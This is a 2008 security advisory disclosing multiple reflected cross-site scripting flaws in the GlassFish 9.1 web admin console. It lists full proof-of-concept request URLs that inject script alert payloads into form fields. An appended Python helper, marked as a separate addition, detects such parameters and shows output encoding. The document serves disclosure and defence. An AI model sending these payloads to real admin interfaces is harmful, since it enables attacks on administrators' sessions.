==============================
Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs))
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 14 june 2008
Site: http://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Description:

This vulnerability affects several pages of the Glassfish webadmin interface. The affected pages accept malicious or unexpected data in their input fields, and the submitted value is reflected into the page (XSS). It was found in more than 10 input fields in Glassfish.

Vulnerable URLs:

http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&propertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Acol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%
http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFlowPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_id201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<script>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_id125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2

http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xss')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>alert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton

And others =)

--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
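Added example, not part of the advisory or of Glassfish: a small Python script that takes admin-console request URLs of the kind listed above, URL-decodes each form parameter and reports which parameters carry HTML-active characters, then shows the output encoding that neutralises such a value when a page reflects it. The hostname admin.example, the sample requests and their values are constructed here; only the parameter names follow the advisory. The same check can be run over the query strings in an access log to find attempts against these pages.

```python
"""Detection and mitigation helper for reflected values in JSF admin forms.

Constructed example: the requests below are modelled on the advisory's
URLs but use a placeholder host and made-up values.
"""
from html import escape
from urllib.parse import unquote_plus, urlsplit

# Characters that let a reflected value break out of HTML text content or an
# attribute value: '<' and '>' open tags, quotes and '&' matter in attributes.
HTML_ACTIVE = set("<>\"'&")

# Constructed sample requests (placeholder host admin.example). The first and
# third carry the advisory's test string, once percent-encoded and once raw;
# the second carries only benign values and must not be reported.
SAMPLE_REQUESTS = [
    "http://admin.example/resourceNode/jdbcResourceNew.jsf?"
    "propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++"
    "&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3Ajnditext="
    "%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=jdbc%2FMyDS"
    "&javax.faces.ViewState=j_id185%3Aj_id201",
    "http://admin.example/resourceNode/customResourceNew.jsf?"
    "propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AjndiProp%3AJndiNew=jndi%2Fcustom"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AdescProp%3Adesc=My%20resource",
    "http://admin.example/applications/lifecycleModulesNew.jsf?"
    "propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AclassNameProp%3Aclassname=<script>alert('xss2');</script>"
    "&propertyForm%3AhelpKey=lifecyclemodules.html",
]


def decoded_params(url):
    """Split the query string on '&' and URL-decode each name and value.

    Splitting by hand (rather than parse_qsl) keeps a ';' inside a value
    intact on every Python version; unquote_plus also maps '+' to a space,
    as form encoding requires.
    """
    query = urlsplit(url).query
    pairs = []
    for field in query.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_params(url):
    """Return (page, parameter, decoded value) for every parameter whose
    decoded value contains an HTML-active character."""
    page = urlsplit(url).path
    hits = []
    for name, value in decoded_params(url):
        if HTML_ACTIVE & set(value):
            hits.append((page, name, value))
    return hits


def scan(urls):
    """Summarise a batch of requests as {page: [flagged parameter names]}."""
    report = {}
    for url in urls:
        for page, name, _ in suspicious_params(url):
            report.setdefault(page, []).append(name)
    return report


def render_reflected(value):
    """Mitigation side: encode a submitted value before placing it in HTML
    text or an attribute, so every HTML-active character becomes an entity
    and the browser treats the whole value as data rather than markup."""
    return escape(value, quote=True)


if __name__ == "__main__":
    for page, names in scan(SAMPLE_REQUESTS).items():
        print(page)
        for n in names:
            print("   ", n)
    print(render_reflected("<script>alert('xss');</script>"))
```

Run over the constructed samples, the report lists the jdbcResourceNew.jsf and lifecycleModulesNew.jsf requests with the flagged parameter, and nothing for the benign customResourceNew.jsf request; the last line shows the encoded form that a fixed page would emit. Encoding belongs at output time, when the value is written into the page, not at input time: the same value may later be written into a different context (attribute, JavaScript, URL) that needs its own encoding.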